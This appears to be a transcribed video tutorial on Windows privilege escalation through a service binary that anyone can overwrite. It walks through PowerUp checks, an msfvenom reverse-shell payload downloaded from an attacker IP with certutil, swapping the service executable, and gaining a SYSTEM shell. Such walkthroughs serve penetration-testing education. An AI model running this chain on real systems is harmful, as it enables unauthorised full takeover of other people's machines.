Hey everyone, today we're going to go over Jutsu number 11, executable files. So I am in the power up folder and I'm going to do PowerShell EP bypass. I'm going to load my script up, power up, invoke all checks, and as we wait for that, we're going to go over to my blog. So you can do this two ways. You can run power up and it'll show something like this. It'll say checking service executable and argument permissions, and it'll display what's vulnerable, and then, or you could use access check, and if it has everyone with file all access, that means you can overwrite that as well. All right, let's see. All right, here it is. So it's saying that the permissions are off and we can overwrite file perm service. So what I'm gonna do is I'm going to take MSN Venom. We're going to go over here. Okay, everything looks good. And over here, I'm going to listen on port 444. All right, looks like that was made. All right, I'm going to go back to my box. We're going to go into the temp folder. And I'm going to do cert util f url cache 10.2.43.23.shell.exe and then shell.exe. Okay, looks like it got that, and then we're going to copy it from the temp folder. And then we're going to replace file perm service. Okay, paste. Oh, it's because we're in PowerShell. Let's exit out and paste again. Oh, okay, I see. So I called it x.exe, it should be shell.exe. Okay, that should work. Now it's copied. I copied shell.exe to file perm service. So in order to start that, we should do this command. Okay, paste. And if we go back here, you can see we got our shell. And if we do the whoami command, we are NT authority system. Now you could do it two ways. Didn't write it here, but you can either do Windows service or you can do an MS Venom reverse shell.